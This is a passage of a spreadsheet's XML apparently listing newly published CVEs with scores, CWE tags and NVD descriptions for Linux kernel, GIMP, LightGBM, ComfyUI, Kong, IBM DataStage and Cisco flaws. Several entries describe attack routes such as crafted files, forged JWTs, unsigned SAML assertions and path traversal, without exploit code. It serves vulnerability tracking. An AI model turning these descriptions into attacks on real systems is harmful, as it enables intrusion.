Take a V4L2 device reference for the ALSA card and drop it from the card
private_free callback. This keeps struct usbtv valid until ALSA has closed
the remaining files and freed the card.</t>
        </is>
      </c>
      <c r="S536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90032</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90043</t>
        </is>
      </c>
      <c r="D537" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E537" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F537" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G537" s="5" t="inlineStr"/>
      <c r="H537" s="5" t="inlineStr"/>
      <c r="I537" s="5" t="inlineStr"/>
      <c r="J537" s="5" t="inlineStr"/>
      <c r="K537" s="5" t="inlineStr"/>
      <c r="L537" s="5" t="inlineStr"/>
      <c r="M537" s="5" t="inlineStr"/>
      <c r="N537" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O537" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P537" s="5" t="inlineStr"/>
      <c r="Q537" s="5" t="inlineStr"/>
      <c r="R537" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
zram: fix slot lock bit position on big-endian 64-bit
The slot lock is a bit operation on the whole __lock word, which flags and
ac_time alias as two u32s.  On little-endian the lock bit lands in the
position ZRAM_ENTRY_LOCK reserves in flags, so the aliasing works out.  On
64-bit big-endian it lands in ac_time instead: with
ZRAM_TRACK_ENTRY_ACTIME enabled, storing the access time from
mark_slot_accessed() or slot_free() wipes out the held lock bit, letting
another CPU take the same slot lock; an access time value with that bit
set makes the slot look locked forever.
Shift the lock bit into the flags half of the word on big-endian 64-bit.</t>
        </is>
      </c>
      <c r="S537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90043</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90044</t>
        </is>
      </c>
      <c r="D538" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E538" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F538" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G538" s="5" t="inlineStr"/>
      <c r="H538" s="5" t="inlineStr"/>
      <c r="I538" s="5" t="inlineStr"/>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr"/>
      <c r="L538" s="5" t="inlineStr"/>
      <c r="M538" s="5" t="inlineStr"/>
      <c r="N538" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O538" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P538" s="5" t="inlineStr"/>
      <c r="Q538" s="5" t="inlineStr"/>
      <c r="R538" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: f_fs: Fix Use-After-Free in AIO error path
In ffs_epfile_write_iter() and ffs_epfile_read_iter(), when ffs_epfile_io()
fails with an error other than -EIOCBQUEUED, the io_data structure (`p`) is
freed. However, for AIO operations, the kiocb cancel function was already
armed and kiocb-&gt;private was set to `p`.
If a concurrent cancel operation (such as sys_io_cancel()) executes after
ffs_epfile_io() fails but before the function frees `p`, a Use-After-Free
can occur when the cancellation handler accesses the freed pointer.
To securely fix this race condition, we must properly un-arm the
cancellation. Invoking `kiocb-&gt;ki_complete()` does exactly this by
acquiring `ctx-&gt;ctx_lock` and safely removing the kiocb from the active
sequence. In doing so, it ensures that a parallel io_cancel can no longer
discover the kiocb, effectively closing the race window.
We then return -EIOCBQUEUED to notify the VFS layer that the kiocb has been
consumed and it should avoid attempting to complete the request again or
triggering subsequent completion handlers.</t>
        </is>
      </c>
      <c r="S538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90044</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90045</t>
        </is>
      </c>
      <c r="D539" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E539" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F539" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G539" s="5" t="inlineStr"/>
      <c r="H539" s="5" t="inlineStr"/>
      <c r="I539" s="5" t="inlineStr"/>
      <c r="J539" s="5" t="inlineStr"/>
      <c r="K539" s="5" t="inlineStr"/>
      <c r="L539" s="5" t="inlineStr"/>
      <c r="M539" s="5" t="inlineStr"/>
      <c r="N539" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O539" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P539" s="5" t="inlineStr"/>
      <c r="Q539" s="5" t="inlineStr"/>
      <c r="R539" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
USB: gadget: ffs: fix mm lifetime handling
io_data stores a pointer to the submitting task's mm_struct,
but does not currently hold a reference to it while async
requests are pending.
This can result in a use-after-free if the task exits before
completion handling finishes.
Take a reference with mmgrab() when queuing the read request
and release it with mmdrop() on request completion.</t>
        </is>
      </c>
      <c r="S539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90045</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90046</t>
        </is>
      </c>
      <c r="D540" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E540" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F540" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="inlineStr"/>
      <c r="I540" s="5" t="inlineStr"/>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr"/>
      <c r="L540" s="5" t="inlineStr"/>
      <c r="M540" s="5" t="inlineStr"/>
      <c r="N540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O540" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P540" s="5" t="inlineStr"/>
      <c r="Q540" s="5" t="inlineStr"/>
      <c r="R540" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/page_alloc: don't spin_trylock() in NMI on UP
Patch series "mm/page_alloc: fixes for free_pages_nolock() on RT/UP".
Pre-existing bugs found by Sashiko during review of this other series:
https://lore.kernel.org/all/20260703-alloc-trylock-v5-0-c87b714e19d3@google.com/
I have not reproduced these bugs, and I suspect there is no real-world
user that is affected by them.
This patch (of 2):
As noted in can_spin_trylock(), using this is unsafe in this context. 
commit 620b46ed6ae17 ("mm/page_alloc: return NULL early from
alloc_frozen_pages_nolock() in NMI on UP") fixed this on the alloc side
but missed the free side.
Impact: If BPF programs using these features in NMI (probably tracing) are
present on non-SMP builds this might crash the kernel and is probably
exploitable by local attackers for privilege escalation.</t>
        </is>
      </c>
      <c r="S540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90046</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90047</t>
        </is>
      </c>
      <c r="D541" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E541" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F541" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G541" s="5" t="inlineStr"/>
      <c r="H541" s="5" t="inlineStr"/>
      <c r="I541" s="5" t="inlineStr"/>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr"/>
      <c r="L541" s="5" t="inlineStr"/>
      <c r="M541" s="5" t="inlineStr"/>
      <c r="N541" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O541" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P541" s="5" t="inlineStr"/>
      <c r="Q541" s="5" t="inlineStr"/>
      <c r="R541" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/xe: Don't hand out the flat CCS storage as usable VRAM
get_flat_ccs_offset() reads the base of the flat CCS storage from the
hardware, scales it by the number of enabled L3 nodes, and rounds the
result up to 128K.  Everything below that offset is then handed to the
VRAM allocator as usable memory.
Rounding a limit that means "usable memory ends here" upwards publishes
whatever lies between the real base and the rounded one as free memory,
and that memory belongs to the compression hardware.  The scaled value
has no reason to be 128K aligned, and on a Battlemage G21 with 16 GiB it
is not:
	flat CCS base: raw 0x3fafff800, rounded 0x3fb000000
so the last 2 KiB of page 0x3fafff000 is CCS storage, in the allocator's
pool.  Whatever is allocated there gets that tail overwritten by the
compression hardware, which needs no page-table entry, no buffer object
and no GPU submission to do it, and does it before userspace exists.
On this machine a Mesa VM's level-3 page table landed on that page on
every cold boot.  It lost the entry covering the compositor's
batch-buffer heap, so the compositor's first submission faulted fetching
its batch and gdm restarted it forever: a black screen on an otherwise
working machine.  Restarting gdm cleared it because the next VM's page
tables were allocated somewhere else.
Round down instead, to the page size the allocator works in.  On this
machine that excludes exactly one page.
Reading the reserved page afterwards shows what had been writing it:
	[369] 0xcccc000000000000
	[371] 0xcc77000000000000
	[373] 0xcccc000000000000
	[375] 0xcc77000000000000
compression metadata, two bytes per sixteen, sitting where the driver
used to hand out memory.
The assertion that should have caught this compares the offset against
GSMBASE - ccs_size for equality.  That value is 128K aligned, so it
agrees with the rounded-up offset precisely when the base is not
aligned - the check cannot fail in the case it exists to catch, and is
compiled out unless CONFIG_DRM_XE_DEBUG is set.  Replace it with one
that can fail: CCS storage must not run into GSM.
[ And this was a debug session from hell, enormously helped by an AI
  doing much of the grunt-work.
  I'd like to call it my tireless helper, but the AI several times
  stated flat out that this was impossible and unsolvable and that we
  should just write a report about it.
  I suspect those things have been trained by people who may not be
  quite as stubborn as I am.
  But while the AI was ready to give up several times, it did keep
  adding debug code and analyzing it faithfully when I pushed. So credit
  where credit is due and I let the AI write the commit message above.
  This is basically a one-liner fixing a bogus "round_up()" to a
  "round_down()", but there were 24 patches adding more and more debug
  information to this, and 18 kernel boot to finally narrow it down to
  this.   - Linus ]</t>
        </is>
      </c>
      <c r="S541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90047</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90947</t>
        </is>
      </c>
      <c r="D542" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E542" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I542" s="5" t="inlineStr"/>
      <c r="J542" s="5" t="inlineStr"/>
      <c r="K542" s="5" t="inlineStr"/>
      <c r="L542" s="5" t="inlineStr"/>
      <c r="M542" s="5" t="inlineStr"/>
      <c r="N542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O542" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P542" s="5" t="inlineStr"/>
      <c r="Q542" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R542" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GIMP. When processing a specially crafted lighting preset file, the Lighting Effects filter does not properly validate the number of light sources. This can lead to an out-of-bounds write, corrupting memory. An attacker could exploit this by convincing a user to open a malicious preset file, potentially causing a crash or enabling arbitrary code execution.</t>
        </is>
      </c>
      <c r="S542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90947</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90948</t>
        </is>
      </c>
      <c r="D543" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E543" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F543" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I543" s="5" t="inlineStr"/>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr"/>
      <c r="L543" s="5" t="inlineStr"/>
      <c r="M543" s="5" t="inlineStr"/>
      <c r="N543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O543" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P543" s="5" t="inlineStr"/>
      <c r="Q543" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R543" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GIMP's ICO file loader. When processing an ICO file containing an embedded PNG image, an integer overflow can occur during the calculation of the required buffer size. This leads to an undersized buffer being allocated, causing a heap-based buffer overflow when the decoded pixel data is written. A remote attacker could exploit this by crafting a malicious ICO file, which, when opened, could lead to arbitrary code execution or a crash.</t>
        </is>
      </c>
      <c r="S543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90948</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90949</t>
        </is>
      </c>
      <c r="D544" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E544" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F544" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G544" s="5" t="inlineStr"/>
      <c r="H544" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I544" s="5" t="inlineStr"/>
      <c r="J544" s="5" t="inlineStr"/>
      <c r="K544" s="5" t="inlineStr"/>
      <c r="L544" s="5" t="inlineStr"/>
      <c r="M544" s="5" t="inlineStr"/>
      <c r="N544" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O544" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P544" s="5" t="inlineStr"/>
      <c r="Q544" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R544" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GIMP's PSP (Paint Shop Pro) file loader. When processing a compressed selection channel, a heap-based buffer overflow can occur due to a mismatch between the allocated buffer size and the amount of data decompressed. A remote attacker could exploit this vulnerability by crafting a malicious PSP file. Opening this file in GIMP could lead to a crash or arbitrary code execution.</t>
        </is>
      </c>
      <c r="S544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90949</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92786</t>
        </is>
      </c>
      <c r="D545" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E545" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G545" s="5" t="inlineStr"/>
      <c r="H545" s="5" t="inlineStr"/>
      <c r="I545" s="5" t="inlineStr"/>
      <c r="J545" s="5" t="inlineStr"/>
      <c r="K545" s="5" t="inlineStr"/>
      <c r="L545" s="5" t="inlineStr"/>
      <c r="M545" s="5" t="inlineStr"/>
      <c r="N545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O545" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P545" s="5" t="inlineStr"/>
      <c r="Q545" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R545" s="5" t="inlineStr">
        <is>
          <t>LightGBM through 4.7.0 fails to validate child and split array values when parsing text models, allowing attackers to write out-of-bounds memory during SHAP prediction. Attackers can craft malicious model files with invalid node references that trigger out-of-bounds writes at attacker-chosen offsets in the leaf_depth_ buffer during feature contribution computation.</t>
        </is>
      </c>
      <c r="S545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92786</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92816</t>
        </is>
      </c>
      <c r="D546" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E546" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="inlineStr"/>
      <c r="I546" s="5" t="inlineStr"/>
      <c r="J546" s="5" t="inlineStr"/>
      <c r="K546" s="5" t="inlineStr"/>
      <c r="L546" s="5" t="inlineStr"/>
      <c r="M546" s="5" t="inlineStr"/>
      <c r="N546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O546" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P546" s="5" t="inlineStr"/>
      <c r="Q546" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R546" s="5" t="inlineStr">
        <is>
          <t>ComfyUI before 0.30.0 fails to sanitize folder_name input in dataset save nodes, allowing attackers to write files to arbitrary paths outside the output directory. Attackers can load a crafted workflow that writes attacker-controlled content to arbitrary locations, enabling code execution through modified startup files or package initializers.</t>
        </is>
      </c>
      <c r="S546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92816</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14916</t>
        </is>
      </c>
      <c r="D547" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E547" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F547" s="5" t="inlineStr">
        <is>
          <t>02762ae7-200e-4b20-9b2b-a77d5b8fc4cb</t>
        </is>
      </c>
      <c r="G547" s="5" t="inlineStr"/>
      <c r="H547" s="5" t="inlineStr"/>
      <c r="I547" s="5" t="inlineStr"/>
      <c r="J547" s="5" t="inlineStr"/>
      <c r="K547" s="5" t="inlineStr"/>
      <c r="L547" s="5" t="inlineStr"/>
      <c r="M547" s="5" t="inlineStr"/>
      <c r="N547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O547" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P547" s="5" t="inlineStr"/>
      <c r="Q547" s="5" t="inlineStr">
        <is>
          <t>CWE-241</t>
        </is>
      </c>
      <c r="R547" s="5" t="inlineStr">
        <is>
          <t>A JWT signature verification vulnerability affects Kong components that perform JWT validation for MCP OAuth2 or DataKit integrations inside Kong API Gateway Enterprise. The affected code does not properly validate that the JWT signing algorithm is compatible with the type of key used for verification.
As a result, an unauthenticated remote attacker may be able to craft a forged JWT that is incorrectly accepted as valid, leading to authentication bypass and potential compromise of confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="S547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14916</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14917</t>
        </is>
      </c>
      <c r="D548" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E548" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F548" s="5" t="inlineStr">
        <is>
          <t>02762ae7-200e-4b20-9b2b-a77d5b8fc4cb</t>
        </is>
      </c>
      <c r="G548" s="5" t="inlineStr"/>
      <c r="H548" s="5" t="inlineStr"/>
      <c r="I548" s="5" t="inlineStr"/>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr"/>
      <c r="L548" s="5" t="inlineStr"/>
      <c r="M548" s="5" t="inlineStr"/>
      <c r="N548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O548" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P548" s="5" t="inlineStr"/>
      <c r="Q548" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R548" s="5" t="inlineStr">
        <is>
          <t>A SAML authentication bypass vulnerability affects the Kong SAML plugin when the validate_assertion_signature option is explicitly set to false. This option is enabled by default. When disabled, the plugin may extract the SAML identity from an unsigned assertion and authenticate the user without verifying a valid cryptographic signature.
As a result, an unauthenticated remote attacker may be able to submit a crafted SAML response and impersonate arbitrary users, including administrators</t>
        </is>
      </c>
      <c r="S548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14917</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16432</t>
        </is>
      </c>
      <c r="D549" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E549" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F549" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I549" s="5" t="inlineStr"/>
      <c r="J549" s="5" t="inlineStr"/>
      <c r="K549" s="5" t="inlineStr"/>
      <c r="L549" s="5" t="inlineStr"/>
      <c r="M549" s="5" t="inlineStr"/>
      <c r="N549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O549" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P549" s="5" t="inlineStr"/>
      <c r="Q549" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R549" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 IBM DataStage PxXMLInput operator could allow a remote authenticated attacker to obtain sensitive information due to an XML external entity (XXE) injection.</t>
        </is>
      </c>
      <c r="S549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16432</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20342</t>
        </is>
      </c>
      <c r="D550" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E550" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="inlineStr"/>
      <c r="I550" s="5" t="inlineStr"/>
      <c r="J550" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K550" s="5" t="inlineStr"/>
      <c r="L550" s="5" t="inlineStr"/>
      <c r="M550" s="5" t="inlineStr"/>
      <c r="N550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O550" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P550" s="5" t="inlineStr"/>
      <c r="Q550" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R550" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in a specific file download API of Cisco Secure FMC Software could allow an authenticated, remote attacker to download arbitrary files from an affected system.
This vulnerability exists because user input is not being sanitized. An attacker could exploit this vulnerability by sending a crafted HTTPS request. A successful exploit could allow the attacker to download arbitrary files from the affected system.
To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Security Analyst (read-only).</t>
        </is>
      </c>
      <c r="S550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20342</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29811</t>
        </is>
      </c>
      <c r="D551" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E551" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F551" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G551" s="5" t="inlineStr"/>
      <c r="H551" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I551" s="5" t="inlineStr"/>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr"/>
      <c r="L551" s="5" t="inlineStr"/>
      <c r="M551" s="5" t="inlineStr"/>
      <c r="N551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O551" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P551" s="5" t="inlineStr"/>
      <c r="Q551" s="5" t="inlineStr">
        <is>
          <t>CWE-1025</t>
        </is>
      </c>
      <c r="R551" s="5" t="inlineStr">
        <is>
          <t>CyberPanel before 2.4.4 attempts to detect an "alais" domain (i.e., a second domain that serves the same content as a primary domain; normally spelled "alias") via an ORM query filter rather than a Python "if" statement.</t>
        </is>
      </c>
      <c r="S551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29811</t>
        </is>
      </c>
    </row>
    <row r="552">
